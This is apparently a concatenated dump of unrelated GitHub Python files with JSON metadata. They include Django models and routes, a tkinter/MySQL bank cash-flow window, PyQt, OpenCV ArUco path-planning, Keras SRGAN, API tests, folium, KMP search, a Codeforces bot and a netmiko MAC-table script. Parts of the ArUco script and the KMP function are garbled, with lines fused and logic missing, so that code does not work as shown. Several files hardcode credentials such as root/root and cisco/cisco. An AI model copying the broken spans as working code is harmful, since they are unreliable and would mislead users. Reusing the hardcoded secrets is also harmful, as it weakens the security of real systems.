& Canada), Bogota, Lima'),\n ('-4.0', 'GMT -4:00 Atlantic Time (Canada), Caracas, La Paz'),\n ('-3.5', 'GMT -3:30 Newfoundland'),\n ('-3.0', 'GMT -3:00 Brazil, Buenos Aires, Georgetown'),\n ('-2.0', 'GMT -2:00 Mid-Atlantic'),\n ('-1.0', 'GMT -1:00 hour Azores, Cape Verde Islands'),\n ('0.0', 'GMT Western Europe Time, London, Lisbon, Casablanca'),\n ('1.0', 'GMT +1:00 Brussels, Copenhagen, Madrid, Paris'),\n ('2.0', 'GMT +2:00 Kaliningrad, South Africa'),\n ('3.0', 'GMT +3:00 Baghdad, Riyadh, Moscow, St. Petersburg'),\n ('3.5', 'GMT +3:30 Tehran'),\n ('4.0', 'GMT +4:00 Abu Dhabi, Muscat, Baku, Tbilisi'),\n ('4.5', 'GMT +4:30 Kabul'),\n ('5.0', 'GMT +5:00 Ekaterinburg, Islamabad, Karachi, Tashkent'),\n ('5.5', 'GMT +5:30 Bombay, Calcutta, Madras, New Delhi'),\n ('5.75', 'GMT +5:45 Kathmandu'),\n ('6.0', 'GMT +6:00 Almaty, Dhaka, Colombo'),\n ('7.0', 'GMT +7:00 Bangkok, Hanoi, Jakarta'),\n ('8.0', 'GMT +8:00 Beijing, Perth, Singapore, Hong Kong'),\n ('9.0', 'GMT +9:00 Tokyo, Seoul, Osaka, Sapporo, Yakutsk'),\n ('9.5', 'GMT +9:30 Adelaide, Darwin'),\n ('10.0', 'GMT +10:00 Eastern Australia, Guam, Vladivostok'),\n ('11.0', 'GMT +11:00 Magadan, Solomon Islands, New Caledonia'),\n ('12.0', 'GMT +12:00 Auckland, Wellington, Fiji, Kamchatka'),\n )\n \n timezone = models.CharField(max_length=5,choices=TIMEZONE_CHOICES,default='GMT')\n \n #class User methods:\n \n def __str__(self):\n return \"Usuario \" + self.first_name + \" \" + self.last_name + \" dado de alta\"\n\n def get_absolute_url(self):\n #Returns the url to access a particular instance of the model\n return reverse('model-detail-view', args=[str(self.id)])\n \n def get_name(self):\n return self.firt_name + ' ' + self.last_name\n \n \nclass Company(models.Model):\n \n company_id=models.AutoField(primary_key=True)\n company_name = models.CharField(max_length=100)\n \n #class Company methods:\n \n def __str__(self):\n return \"Empresa \" + self.company_name + \" dada de alta\"\n \n def get_absolute_url(self):\n #Returns the url to access a particular instance of the model\n return reverse('model-detail-view', args=[str(self.id)])\n \n \nclass Employee(models.Model):\n \n company_id = models.ForeignKey('Company')\n user_id = models.ForeignKey('User')\n \n department = models.CharField(max_length=40)\n \n PROFILE_CHOICES = (\n (1, 'CEO'),\n (2, 'Senior Manager'),\n (3, 'Sales'),\n (4, 'Administrations, Financial, Operations'),\n (5, 'Marketing & PR'),\n (6, 'Consulting, Projet Management'),\n (7, 'Customer Care'),\n (8, 'Engineering, Systems, R&D'),\n (9, 'Training'),\n )\n \n profile = models.IntegerField(choices=PROFILE_CHOICES)\n \n WORKINGTIME_CHOICES = (\n (1, 'Fulltime'),\n (2, 'Partime'),\n )\n \n working_time = models.IntegerField(choices=WORKINGTIME_CHOICES,default=1)\n \n #class Employee methods:\n \n def __str__(self):\n return str(self.user_id) + \" \" + str(self.company_id)\n\n def get_absolute_url(self):\n #Returns the url to access a particular instance of the model\n return reverse('model-detail-view', args=[str(self.id)])\n \n #def dept_manager(company_id, department):\n ","repo_name":"JuandeGA/rationalmap","sub_path":"register/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71553015147","text":"from tkinter import *\r\nfrom datetime import date\r\nimport datetime\r\nfrom PIL import Image,ImageTk\r\nfrom tkinter import messagebox\r\nimport 
mysql.connector\r\nmycon=mysql.connector.connect(host=\"localhost\", user=\"root\", passwd=\"root\", database=\"bank\")\r\nmycon.autocommit=True\r\ncursor=mycon.cursor()\r\n\r\nclass check_cash_flow():\r\n    def __init__(self,root):\r\n        self.root=root\r\n        self.root.title(\"IBBI BANK\")\r\n        self.root.geometry(\"700x500\")\r\n\r\n        #---------------------------------------------------------title----------------------------------------------------------------------------------------------\r\n        lbl_title=Label(self.root,text=\"Today's Cash Flow\",font=(\"times new roman\",15,\"bold\"),bg=\"black\",fg=\"gold\",bd=4,relief=RIDGE)\r\n        lbl_title.place(x=0,y=0,width=700,height=50)\r\n\r\n        img2=Image.open(r\"G:\\My Drive\\PROJECT BANK\\logo.png\")\r\n        img2=img2.resize((120,45),Image.Resampling.LANCZOS)\r\n        self.photoimg2=ImageTk.PhotoImage(img2)\r\n        \r\n        lblimg=Label(self.root,image=self.photoimg2,bd=0,relief=RIDGE)\r\n        lblimg.place(x=5,y=2,width=100,height=40)\r\n\r\n        def getValue():\r\n            d=date.today()\r\n            print(\"Cash Flow on:\",d)\r\n\r\n            \r\n            \r\n            s=\"select sum(amount) from withdrawal where date_of_withdrawal='{}' \".format(d)\r\n            cursor.execute(s)\r\n            row=cursor.fetchone()\r\n            if row[0]==None:\r\n                withdrawal=0.00\r\n            else:\r\n                withdrawal=row[0]\r\n            print(\"withdrawal:\",withdrawal)\r\n            withdrawal=str(withdrawal)\r\n            \r\n\r\n            \r\n            s=\"select sum(amount) from deposit where date_of_deposit='{}' \".format(d)\r\n            cursor.execute(s)\r\n            row=cursor.fetchone()\r\n            if row[0]==None:\r\n                deposit=0.00\r\n            else:\r\n                deposit=row[0]\r\n            print(\"deposit\",deposit)\r\n            \r\n            \r\n            print(\"balance remaining in bank:\", float(deposit)-float(withdrawal))\r\n            rem_bal=float(deposit)-float(withdrawal)\r\n\r\n            deposit=float(deposit)\r\n\r\n            withdrawal=float(withdrawal)\r\n\r\n            sensor_value=\"Cash Flow on: \"+str(d)\r\n            p=sensor_value\r\n            sensor_value=\"Deposit: \"+str(\"%10.2f\"%deposit)\r\n            x=sensor_value\r\n            sensor_value=\"Withdrawal: \"+str(\"%10.2f\"%withdrawal)\r\n            y=sensor_value\r\n            sensor_value=\"Remaining Balance: \"+str(\"%10.2f\"%rem_bal)\r\n            z=sensor_value\r\n\r\n            text=Label(root,text=p,font=(\"times new roman\",25,\"bold\"),fg=\"black\",relief=RIDGE)\r\n            text.place(x=90,y=150)\r\n            text=Label(root,text=x,font=(\"times new roman\",25,\"bold\"),bg=\"black\",fg=\"gold\",relief=RIDGE)\r\n            text.place(x=90,y=200)\r\n            text=Label(root,text=y,font=(\"times new roman\",25,\"bold\"),bg=\"black\",fg=\"gold\",relief=RIDGE)\r\n            text.place(x=90,y=250)\r\n            text=Label(root,text=z,font=(\"times new roman\",25,\"bold\"),bg=\"black\",fg=\"gold\",relief=RIDGE)\r\n            text.place(x=90,y=300)\r\n\r\n            \r\n            \r\n\r\n            \r\n        getValue()\r\n        def close_win():\r\n\r\n            root.destroy()\r\n\r\n            \r\n            \r\n        btn=Button (self.root,text=\"Close\",padx=2,pady=6,command=close_win)\r\n        btn.pack(side='bottom')\r\n\r\n        \r\n\r\n        \r\n\r\n        \r\n\r\n        \r\n\r\n        \r\n\r\nif __name__==\"__main__\":\r\n    root=Tk()\r\n    obj=check_cash_flow(root)\r\n    root.mainloop()\r\n\r\n","repo_name":"Sairindhrii/Banking-System","sub_path":"cash_flow_graphics.py","file_name":"cash_flow_graphics.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41896807468","text":"import sys\n\nfrom PyQt5.QtCore import Qt, QSize\nfrom PyQt5.QtWidgets import QApplication, QLabel, QMainWindow, QTextEdit\n\n\nclass MainWindow(QMainWindow):\n    def __init__(self):\n        super().__init__() # The subclass inherits all of the parent's properties and methods instead of reinitializing them. 
Properties and methods with the same name are overridden\n        self.setWindowTitle(\"Event Handling Example\")\n        self.setMinimumSize(QSize(500, 400))\n\n        self.label = QLabel(\"Click This window\")\n        self.setCentralWidget(self.label)\n        # self.setMouseTracking(True)\n\n    def mousePressEvent(self, e):\n\n        if e.button() == Qt.LeftButton:\n            # handle the left-button press in here\n            self.label.setText(\"mousePressEvent LEFT\")\n\n        elif e.button() == Qt.MiddleButton:\n            # handle the middle-button press in here.\n            self.label.setText(\"mousePressEvent MIDDLE\")\n\n        elif e.button() == Qt.RightButton:\n            # handle the right-button press in here.\n            self.label.setText(\"mousePressEvent RIGHT\")\n\n    def mouseReleaseEvent(self, e):\n        if e.button() == Qt.LeftButton:\n            self.label.setText(\"mouseReleaseEvent LEFT\")\n\n        elif e.button() == Qt.MiddleButton:\n            self.label.setText(\"mouseReleaseEvent MIDDLE\")\n\n        elif e.button() == Qt.RightButton:\n            self.label.setText(\"mouseReleaseEvent RIGHT\")\n\n    def mouseDoubleClickEvent(self, e):\n        if e.button() == Qt.LeftButton:\n            self.label.setText(\"mouseDoubleClickEvent LEFT\")\n\n        elif e.button() == Qt.MiddleButton:\n            self.label.setText(\"mouseDoubleClickEvent MIDDLE\")\n\n        elif e.button() == Qt.RightButton:\n            self.label.setText(\"mouseDoubleClickEvent RIGHT\")\n\n\napp = QApplication(sys.argv)\nwindow = MainWindow()\nwindow.show()\napp.exec_()\n","repo_name":"abrar-nazib/cortex","sub_path":"tests/event_example.py","file_name":"event_example.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"20475019367","text":"import cv2\nimport time\nimport math\nimport json\nimport numpy as np\nfrom heapq import heappush, heappop\nimport cv2.aruco as aruco\n\ndef init_graph(graph,height,width):\n    for i in range(width):\n        for j in range(height):\n            graph[(i,j)] = {'visited':False, 'distance':np.inf, 'valid':True, 'parent': (0, 0), 'id':'blank'}\n\n    return graph\n\ndef render_graph(graph,pt1,pt2):\n    clearance = 20\n    radius = 20\n    for i in range(pt1[0],pt2[0]+1):\n        for j in range(pt2[1],pt1[1]+1):\n            graph[(i,j)]['valid'] = False\n            graph[(i,j)]['id'] = 'obs'\n    for i in range(pt1[0]-clearance,pt2[0]+1+clearance):\n        for j in range(pt2[1]-clearance,pt1[1]+1+clearance):\n            if graph[(i,j)]['id'] != 'obs':\n                graph[(i,j)]['valid'] = False\n                graph[(i,j)]['id'] = 'aug'\n\n    return graph\n\ndef aruco_detect_inductpoint(frame):\n\n    inductzone = {}\n    parameters = cv2.aruco.DetectorParameters_create()\n    # Detect the Induct Point markers in the image\n    dictionary = cv2.aruco.Dictionary_get(cv2.aruco.DICT_6X6_250)\n\n    markerCorners, markerIds, rejectedCandidates = cv2.aruco.detectMarkers(frame, dictionary, parameters=parameters)\n    frame = aruco.drawDetectedMarkers(frame, markerCorners)\n    inductzone = extract_induct_point(markerIds, markerCorners)\n\n    # print(\"Induct Zone Aruco Markers Detected\")\n    # print(inductzone)\n\n    return frame, inductzone\n\n# Function to Extract Induct Points\ndef extract_induct_point(ids, bbox):\n    \"\"\"\n    Extracts the induct points from the list, converts\n    them to a dictionary and returns it.\n    \"\"\"\n    l_ind = 0\n    temp_ls, dest_ls = [], []\n\n    for i in ids:\n        name = int(i)\n        cen_x = int((bbox[l_ind][0][0][0] + bbox[l_ind][0][2][0])/2)\n        cen_y = int((bbox[l_ind][0][0][1] + bbox[l_ind][0][2][1])/2)\n        ctp = (cen_x-60, cen_y)\n        temp_ls.append(ctp)\n        dest_ls.append(name)\n        l_ind += 1\n\n    dest = dict(zip(dest_ls, temp_ls))\n\n    return dest\n\ndef get_destination(frame, graph):\n    
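# Detect the DICT_5X5_250 ArUco markers in the frame and derive the destination points from their corners.\n    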
parameters = cv2.aruco.DetectorParameters_create()\n # Detect the markers in the image\n dictionary = cv2.aruco.Dictionary_get(cv2.aruco.DICT_5X5_250)\n markerCorners, markerIds, rejectedCandidates = cv2.aruco.detectMarkers(frame, dictionary, parameters=parameters)\n\n frame = aruco.drawDetectedMarkers(frame, markerCorners)\n\n ind = 0\n ids_ls, cor_ls = [], []\n dic = {}\n\n for i in markerIds:\n ids_ls.append(markerIds[ind][0])\n t = markerCorners[ind].tolist()\n cor_ls.append(t[0])\n ind += 1\n\n temp_ls, sum_ls = [], []\n for k in range(1, 10):\n try:\n indices = [i for i, x in enumerate(ids_ls) if x == k]\n # .append()\n for l in indices:\n sum_ls = sum_ls + cor_ls[l]\n # temp_ls.append(cor_ls[l])\n temp_ls.append(sum_ls)\n sum_ls = []\n except:\n pass\n\n pts_ls = []\n for i in range(0,9):\n try:\n x1 = int((temp_ls[i][0][0] + temp_ls[i][2][0])/2)\n y1 = int((temp_ls[i][0][1] + temp_ls[i][2][1])/2)\n x2 = int((temp_ls[i][4][0] + temp_ls[i][6][0])/2)\n y2 = int((temp_ls[i][4][1] + temp_ls[i][6][1])/2)\n \n if( y1= goal[0] and current[1] <= goal[1]+5 and current[1] >= goal[1] :\n #print(\"Goal reached\")\n (goal_x,goal_y)=(current[0],current[1])\n if row:\n x,y = zip(*row)\n break\n for i in [-3, 0, 3]:\n for j in [-3, 0, 3]:\n if i != 0 or j != 0:\n neighbour = (abs(current[0]+i), abs(current[1]+j))\n lst = list(neighbour)\n if lst[0] >=1280:\n lst[0] = 1279\n if lst[1] >=720:\n lst[1] = 719\n neighbour = tuple(lst)\n if temp[neighbour]['valid'] == True:\n\n if abs(i)+abs(j) == 2:\n distance = math.sqrt(2)\n else:\n distance = 1\n\n if temp[neighbour]['visited'] == False:\n temp[neighbour]['visited'] = True\n row.append([abs(current[0]+i), abs(current[1]+j)])\n x,y = zip(*row)\n\n num_nodes_visited += 1\n temp[neighbour]['parent'] = current\n temp[neighbour]['distance'] = temp[current]['distance'] + distance\n queue_distance = calculate_distance(goal, neighbour)+temp[neighbour]['distance']\n heappush(queue, (queue_distance, neighbour))\n path = [(goal_x, goal_y)]\n parent = (goal_x, goal_y)\n while parent != source:\n parent = temp[path[len(path)-1]]['parent']\n path.append(parent)\n min_distance = (temp[(goal_x,goal_y)]['distance'])\n # print(\"Total Number of Nodes Visited:\", num_nodes_visited)\n \n return(min_distance, path)\n\ndef calculate_distance(goal, current):\n d = math.sqrt(((goal[0]-current[0])*(goal[0]-current[0]))+((goal[1]-current[1])*(goal[1]-current[1])))\n return d\n\nplace = ['Mumbai', 'Delhi', 'Kolkata', \n 'Chennai', 'Bengaluru', 'Hyderabad', \n 'Pune', 'Ahemdabad', 'Jaipur']\ntemp1, temp2 = [], []\nind1, count = 0, 0\ndestination = {}\ngraph = {}\n\nframe = cv2.imread(\"images/img.png\")\n# frame = cv2.imread(\"test.jpg\")\n# frame = cv2.resize(frame, (640, 360))\n\ngraph = init_graph(graph,720,1280)\n\nframe, destination = get_destination(frame, graph)\nframe, inductzone = aruco_detect_inductpoint(frame)\n# ins = json.dumps(destination)\n# print(ins)\n# des = {'bot1': (1024, 431)}\n# ins = json.dumps(des)\n# print(ins)\nprint(destination)\n# destination.update(des)\n# print(destination)\n# print(graph)\nprint(destination['Mumbai'][0])\nprint(inductzone[1][0])\nstart = inductzone[1]\ngoal = closest_point(destination['Hyderabad'], start)\npath, angle = path_plan(graph, start, goal)\nframe = mark_points(frame, start, goal, path)\nprint(path)\nprint(angle)\n\n# start = inductzone[2]\n# goal = closest_point(destination['Delhi'], start)\n# path, angle = path_plan(graph, start, goal)\n# frame = mark_points(frame, start, goal, path)\n# print(path)\n# print(angle)\n\n# 
start = inductzone[1]\n# for i in destination:\n# goal = closest_point(destination[i], start)\n# print(i, start, goal)\n# path, angle = path_plan(graph, start, goal)\n# frame = mark_points(frame, start, goal, path)\n# print(path)\n# print(angle)\n\n# start = inductzone[2]\n# for i in destination:\n# goal = closest_point(destination[i], start)\n# print(i, start, goal)\n# path, angle = path_plan(graph, start, goal)\n# frame = mark_points(frame, start, goal, path)\n# print(path)\n# print(angle)\n\ncv2.imshow(\"frame\", frame)\ncv2.waitKey()","repo_name":"hari-vickey/The-Eagle-Eye","sub_path":"test_programs/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":11974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32204651293","text":"from django.urls import path\nfrom django.contrib.auth.views import LogoutView\nfrom django.contrib.auth import views as auth_views\nfrom . import views\n\napp_name = 'accaunt'\n\nurlpatterns = [\n path('', views.IndexView.as_view(), name='homepage'),\n path('sign_in/', views.UserLoginView.as_view(), name='sign_in'),\n path('sign_up/', views.UserRegisterView.as_view(), name='sign_up'),\n path('logout/', LogoutView.as_view(next_page=\"/sign_in/\"), name='logout'),\n path('settings/', views.UserSettingView.as_view(), name='settings'),\n path('profiles/', views.ListUserView.as_view(), name='profiles'),\n path('follow/', views.user_follow, name='user_follow'),\n path('user_detail//', views.UserProfileView.as_view(), name='user_profile'),\n path('create_post/', views.PostCreateView.as_view(), name='post_create')\n]\n","repo_name":"shhamil/SocialNet","sub_path":"accaunt/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27575040177","text":"from keras import Input\nfrom keras.layers import BatchNormalization, Add, PReLU\nfrom keras.layers.convolutional import Conv2D, UpSampling2D\nfrom keras.models import Model\n\n\ndef ResidualBlock(layer_input, filters):\n x = Conv2D(filters=filters, kernel_size=3, strides=1, padding=\"same\")(layer_input)\n x = BatchNormalization(momentum=0.5)(x)\n x = PReLU()(x)\n x = Conv2D(filters, kernel_size=3, strides=1, padding=\"same\")(x)\n x = BatchNormalization(momentum=0.5)(x)\n x = Add()([layer_input, x])\n return x\n\n\ndef UpSample2D(layer_input):\n x = Conv2D(256, kernel_size=3, strides=1, padding=\"same\")(layer_input)\n x = UpSampling2D(size=2)(x)\n x = PReLU()(x)\n return x\n\n\ndef RB_Model(gt_size, scale, channels=3, generator_filters=64, num_blocks=16):\n size = int(gt_size / scale)\n\n net_input = Input(shape=[size, size, channels])\n\n conv1 = Conv2D(64, kernel_size=9, strides=1, padding=\"same\")(net_input)\n conv1 = PReLU()(conv1)\n\n residual_blocks = conv1\n for _ in range(num_blocks):\n residual_blocks = ResidualBlock(residual_blocks, generator_filters)\n\n # Post-residual block\n conv2 = Conv2D(64, kernel_size=3, strides=1, padding=\"same\")(residual_blocks)\n conv2 = BatchNormalization(momentum=0.5)(conv2)\n conv2 = Add()([conv1, conv2])\n\n # Upsampling\n up1 = UpSample2D(conv2)\n up2 = UpSample2D(up1)\n\n # Generate high resolution output\n output = Conv2D(\n channels, kernel_size=9, strides=1, padding=\"same\", activation=\"tanh\"\n )(up2)\n\n model = Model(inputs=net_input, outputs=output, name=\"Generator\")\n model.summary(line_length=80)\n\n return 
model\n","repo_name":"vitgusmao/SuperResolutionGANs","sub_path":"nets/srgan/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16483239440","text":"# -*- coding: utf-8 -*-\nfrom testframework.base import *\nimport types\n\n\nrules_response_headers = {'Connection': 'Keep-Alive', \n 'Cache-Control': 'public, s-maxage=86400', \n 'Content-Type': 'application/vnd.api+json; charset=utf-8'}\n\nrules = {\n \"type\": \"rules\",\n \"id\": \"7\",\n \"attributes\": {\n \"object\": \"App\\\\Models\\\\V1\\\\Magento\\\\Product\\\\Product\",\n \"args\": \"a:2:{s:11:\\\"category_id\\\";i:3;s:5:\\\"limit\\\";i:6;}\",\n \"created_at\": \"2017-09-26 17:23:32\",\n \"updated_at\": \"2017-09-26 17:23:32\"\n },\n \"links\": {\n \"self\": \"https://api-staging.sssports.com/v1/rules/7\"\n }}\n\nno_rules = 2\n\n\nclass TestFiles(BaseTest):\n\n\n def test001_get_rules(self):\n \"\"\" TestCase-23: Test case for test get /rules.*\n **Test Scenario:**\n #. Get /rules, should succeed\n #. Check response headers, should succeed\n #. Check response body, should succeed\n \"\"\" \t\n self.lg('%s STARTED' % self._testID)\n response = self.get_request_response(uri='/rules')\n \n self.lg('#. Get /rules, should succeed')\n self.assertEqual(response.status_code, 200)\n self.assertTrue(response.ok)\n \n self.lg('#. Check response headers, should succeed')\n [self.assertIn(header, response.headers.keys()) for header in rules_response_headers.keys()]\n [self.assertEqual(rules_response_headers[header], response.headers[header]) for header in rules_response_headers.keys()]\n \n self.lg('#. Check response body, should succeed')\n self.assertEqual(type(response.json()), types.DictType)\n\n self.assertIn('data', response.json().keys())\n self.assertEqual(type(response.json()['data']), types.ListType)\n self.assertEqual(len(response.json()['data']), no_rules)\n [self.assertEqual(type(file_dict), types.DictType) for file_dict in response.json()['data']]\n\n for category_dict in response.json()['data']:\n for key in category_dict.keys():\n self.assertIn(key, rules.keys())\n if file_dict['id'] == rules['id']:\n self.assertEqual(file_dict['type'], rules['type']) \n self.assertEqual(file_dict['links'], rules['links']) \n self.assertEqual(file_dict['attributes'], rules['attributes']) \n\n self.lg('%s ENDED' % self._testID) \n \n\n def test002_get_rule(self):\n \"\"\" TestCase-24: Test case for test get /rules/{id}.*\n **Test Scenario:**\n #. Get /rules/{id}, should succeed\n #. Check response headers, should succeed\n #. Check response body, should succeed\n \"\"\" \t\n self.lg('%s STARTED' % self._testID) \n response = self.get_request_response(uri='/rules/%s' % rules['id'])\n \n self.lg('#. Get /rules/{id}, should succeed')\n self.assertEqual(response.status_code, 200)\n self.assertTrue(response.ok) \n \n self.lg('#. Check response headers, should succeed')\n [self.assertIn(header, response.headers.keys()) for header in rules_response_headers.keys()]\n [self.assertIn(rules_response_headers[header], response.headers[header]) for header in rules_response_headers.keys()] \n \n self.lg('#. 
Check response body, should succeed')\n        self.assertEqual(type(response.json()), types.DictType) \n        \n        self.assertIn('data', response.json().keys())\n        self.assertEqual(type(response.json()['data']), types.DictType)\n        self.assertEqual(response.json()['data']['id'], rules['id']) \n        self.assertEqual(response.json()['data']['type'], rules['type']) \n        self.assertEqual(response.json()['data']['links'], rules['links']) \n        self.assertEqual(response.json()['data']['attributes'], rules['attributes']) \n\n        self.lg('%s ENDED' % self._testID)","repo_name":"simplymahmoud/sss-scripts","sub_path":"mobile_api_testing/testsuite/test_014_rules.py","file_name":"test_014_rules.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38122993019","text":"import pandas as pd\nimport folium\n\nclass FoliumTest:\n    def __init__(self):\n        self.context = './data'\n\n    def hook(self):\n        self.show_map()\n\n    def show_map(self):\n        state_geo = self.context + '/us-state.json'\n        state_unemployment = self.context+'/us_unemployment.csv'\n        state_data = pd.read_csv(state_unemployment)\n        m = folium.Map(location=[37,-102], zoom_start=5)\n        # Define the attribute values\n        m.choropleth(\n            geo_data = state_geo,\n            name = 'choropleth',\n            data = state_data,\n            columns = ['State', 'Unemployment'],\n            key_on = 'feature.id',\n            fill_color = 'YlGn',\n            fill_opacity = 0.7, # opacity: transparency\n            line_opacity = 0.2,\n            legend_name = 'Unemployment Rate (%)'\n        )\n        folium.LayerControl().add_to(m)\n        m.save('./saved_data/USA.html') # saved here because the HTML page is not coded in Flask\n","repo_name":"smile2019kr/seoul_cctv","sub_path":"seoul_crime/folium_test.py","file_name":"folium_test.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14746174788","text":"import pandas as pd\n\ndef table():\n    class_scores = [\n        {'성적':'dic1', '국어': 'A','영어': 'A','수학':'C'},\n        {'성적':'dic2','국어':'A','영어': 'B','수학':'C'}\n    ]\n\n    table = pd.DataFrame(class_scores,\n                  columns=['성적','국어', '영어', '수학'])\n    print(table)\n\ntable()\n\n# This alone does print the table, but how can I write a function that assigns the grade values to the table automatically?\n\n# from homework2 import grade_scores2\n# Sometimes the from/import just turns grey - when does that happen? 
Ask someone about this!\n\n# python homework2_dataframe.py","repo_name":"canary4651/TIL","sub_path":"Program/pycharm/homework2_dataframe.py","file_name":"homework2_dataframe.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14948758597","text":"'''\nKnuth–Morris–Pratt algorithm\nauthor:Ammar\n'''\nimport re\nimport math\ndef Lps(pattern):\n    lps=[0]\n    patternList=[c for c in pattern]\n    j=1 #pointer to iterate the main pattern list\n    i=int() #pointer to iterate the suffix\n    k=int() #pointer to iterate the prefix\n    value=int() #value of the longest pattern prefix which is also a suffix\n    \n    while patternList and j0:\n                j=lps[j-1]\n            \n            else:\n                j=0 \n                i+=1\n        print('------i',i)\n        print('exist',exist)\n        print('j',j)    \n        \n        if j==len(pattern):\n            return i-j\n        else:\n            return -1\n    \n    \n    \n    \n    \n\nhaystack='mississippi'\nneedle='issippi'\n    \nprint(KMP( haystack, needle))\n#print(Lps('AAABAAA'))","repo_name":"AmmarElsherif2021/DataStructres_Algorithms","sub_path":"needle-haysack.py","file_name":"needle-haysack.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5798478741","text":"import sys\nimport httpx\n\nfrom nonebot import on_command, logger\nfrom nonebot.rule import to_me\nfrom nonebot.adapters import Bot, Event\nfrom nonebot.adapters.cqhttp import MessageSegment\nfrom nonebot.typing import T_State\nfrom src.plugins.time import timestamp_convert\n\n__plugin_name__ = 'codeforces_user_info'\n__plugin_usage__ = 'Fetch codeforces-related data'\n\n\nasync def get_request(url):\n    try:\n        request = httpx.get(url, timeout=3)\n        get = request.json()\n\n        if request.status_code == httpx.codes.OK and get['status'] == 'OK' and len(get['result']):\n            logger.debug(get['result'])\n            return True, get['result'][0]\n        else:\n            return False, request.status_code\n    except httpx.HTTPError as e:\n        logger.error(e, file=sys.stderr)\n        return False, e\n\n\nsession = on_command(\"info\", rule=to_me(), priority=5)\n\n\n@session.handle()\nasync def get_user_info(bot: Bot, event: Event, state: T_State):\n    user_url = \"https://codeforces.com/api/user.info?handles=\"\n    user_name = str(event.get_message()).strip()\n    print('user_name=%s' % user_name)\n    if user_name == \"\":\n        await session.reject(\"The query name cannot be empty, please re-enter the username to search\")\n        return\n\n    status, info = await get_request(user_url + user_name)\n    if status:\n        sent_message = \"\"\"Name: {name}\nLast visit: {time}\nRank: {rank}\nRating: {rating}\nMax rating: {maxRating}\"\"\" \\\n            .format(name=info.get('handle', 'anonymous'),\n                    time=await timestamp_convert(info.get('lastOnlineTimeSeconds', 'very long')),\n                    rank=info.get('rank', 'unknown'), rating=info.get('rating', 'unknown'),\n                    maxRating=info.get('maxRating', 'unknown'))\n        title_img_url = info.get('titlePhoto')\n        await session.send(MessageSegment.image(title_img_url, timeout=3))\n    else:\n        if info in (200, 400):\n            sent_message = \"User %s does not exist\" % user_name\n            pass\n        else:\n            sent_message = \"http code=%d\" % info\n\n    await session.finish(sent_message)\n","repo_name":"FrankOu2001/codeforces_robot","sub_path":"src/plugins/codeforces_user_info/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32234397317","text":"from netmiko import ConnectHandler\nfrom pprint import pprint\nimport textfsm\nimport glob\nimport os\nfrom tabulate import 
tabulate\n\n# this script reads multiple txt files with the output of show mac address-table\n# txt file should only include the command output - remove \"hostname# show mac table\"\n# txt file filename should be the hostname of the switch - To be used in this script as the hostname\n\n# script will compile all the mac table txt files and compare with the new mac table which is taken\n# by sshing into the new switch and running the show mac address-table command\n# both tables will be compared and the script will find if the mac exists on the new switch and if the vlan is the same\n#\n#--------------------- Example Output ------------------------------#\n\n# New Port    Old Port + Switch    VLAN                MAC Address\n# ----------  -------------------  ------------------  --------------\n# Gi0/2       Gi0/2 esw01          Wrong VLAN- Old: 3  2200.0001.0002\n# NOT FOUND   Gi0/1 esw01          1                   8888.0011.1111\n# Gi0/1       Gi0/2 esw02          1                   5000.0011.1111\n# Gi1/0       Gi0/1 esw02          1                   5000.0022.2222\n# NOT FOUND   Gi0/2 esw03          1                   3333.3333.3333\n# NOT FOUND   Gi0/1 esw03          1                   3232.3232.3232\n\n#--------------------------------------------------------------------#\n\n#---------------CHANGE THESE-----------------------------------------#\nmySwitch = {\n    'device_type': 'cisco_ios',\n    'host': '192.168.30.133',\n    'username': 'cisco',\n    'password': 'cisco',\n    'secret': 'cisco',  # optional, defaults to ''\n}\n\ntemplatePath = r\"C:\\Program Files\\ntc-templates-master\\ntc_templates\\templates\"\n\n#----------------------- END ----------------------------------------#\n\n\ndef convertTxtfsmOp(header, result):\n    '''convert textfsm output to netmiko textfsm output(JSON)'''\n    output = []\n    for n in range(len(result)):\n        res = {header[i].lower(): result[n][i] for i in range(len(header))}\n        output.append(res)\n\n    return output\n\n\nif __name__ == \"__main__\":\n\n    cmd = [\"show mac address-table dynamic\"]\n\n    with ConnectHandler(**mySwitch) as con:\n        con.disable_paging()  # term len 0\n        con.enable()  # enable\n        #prompt = con.find_prompt() #get the prompt eg. ESW01#\n\n        # Dict with the key as command entered, value as output\n        # eg. 
